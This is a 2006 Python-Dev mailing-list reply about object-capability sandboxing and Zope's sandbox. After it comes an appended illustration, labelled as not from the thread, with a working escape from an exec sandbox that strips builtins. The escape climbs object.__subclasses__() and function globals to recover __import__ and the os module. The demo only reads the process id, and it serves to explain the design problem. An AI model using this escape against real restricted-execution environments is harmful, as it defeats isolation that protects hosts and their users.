[Python-Dev] new security doc using object-capabilities
David Hopwood
david.nospam.hopwood at blueyonder.co.uk
Mon Jul 24 00:07:25 CEST 2006
Phillip J. Eby wrote:
> At 01:00 PM 7/23/2006 -0700, Brett Cannon wrote:
>
>>I obviously don't want to change the feel of Python, but if I have to
>>remove the constructor for code objects to prevent evil bytecode or
>>__subclasses__() from object to prevent poking around stuff, then so be
>>it. For this project, security is [trumping] backwards-compatibility when
>>the latter is impossible in order to have the former. I will obviously
>>try to minimize it, but something that works at such a basic level of the
>>language is just going to require some changes for it to work.
>
> Zope 3's sandboxing machinery manages to handle securing these things
> without any language changes. So, declaring it "impossible" to manage
> without backward compatibility seems inappropriate, or at least
> incorrect.
... if Zope's sandboxing is secure. I haven't done a security review of it,
but your argument assumes that it is.
In any case, Zope's sandboxing is not capability-based.
--
David Hopwood <david.nospam.hopwood at blueyonder.co.uk>
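As an added illustration (not code from this thread, from Brett Cannon's project, or from Zope), the following shows concretely why `__subclasses__()` on `object` is the kind of thing Brett says he may have to remove: a naive sandbox that strips `__builtins__` blocks `import os` by name, yet code running inside it can still climb from a literal to `object`, enumerate every loaded class, and pull `__import__` back out of some class's module globals. All names here (`run_restricted`, `ESCAPE_SOURCE`, the helper functions) are mine, and the payload is constructed for the demonstration.

```python
"""Illustrative example (added here, not from the thread): a builtins-stripping
exec() sandbox versus the object.__subclasses__() introspection path."""

import os


def run_restricted(source: str) -> dict:
    """Naive 'sandbox' (assumed for illustration): exec the source with an empty
    __builtins__ so that import, open, getattr, __import__ and friends cannot be
    reached by name. Returns the namespace the code ran in."""
    ns = {"__builtins__": {}}
    exec(source, ns)
    return ns


def import_blocked_by_name() -> bool:
    """The import statement needs __builtins__['__import__']; with it gone,
    CPython raises ImportError, so the naive sandbox looks effective."""
    try:
        run_restricted("import os")
    except ImportError:
        return True
    return False


# Constructed payload. It uses no builtin by name (not even exception classes,
# hence the bare except clauses): it walks () -> tuple -> object, enumerates
# object.__subclasses__(), and for any class whose __init__ is Python code reads
# __init__.__globals__['__builtins__'] to recover the real __import__.
ESCAPE_SOURCE = '''
def _find_import():
    base = ().__class__.__base__            # () is a tuple; tuple's base is object
    for cls in base.__subclasses__():       # every class loaded in the process
        try:
            g = cls.__init__.__globals__    # only a Python-level __init__ has this
        except:                             # slot wrappers (C types) raise here
            continue
        b = g.get("__builtins__")           # that module's builtins, dict or module
        if b is None:
            continue
        try:
            return b["__import__"]          # __builtins__ stored as a dict
        except:
            pass
        try:
            return b.__import__             # __builtins__ stored as the module
        except:
            pass
    return None

_import = _find_import()
os_module = _import("os")                   # full os module, despite the sandbox
pid = os_module.getpid()
'''


def escape_reaches_os() -> bool:
    """Run the payload inside the naive sandbox and check that it really
    obtained the live os module (same object, same pid as the host)."""
    ns = run_restricted(ESCAPE_SOURCE)
    return ns["os_module"] is os and ns["pid"] == os.getpid()


if __name__ == "__main__":
    print("import blocked by name:", import_blocked_by_name())
    print("escape via __subclasses__:", escape_reaches_os())
```

The payload never mentions `os` or `__import__` as a builtin, so filtering names or builtins does not stop it; what it relies on is that `object.__subclasses__()` exposes every class in the interpreter and that Python-defined functions carry `__globals__`. That is the "poking around" Brett refers to, and it is why closing the hole means changing what the language exposes rather than what the sandbox removes.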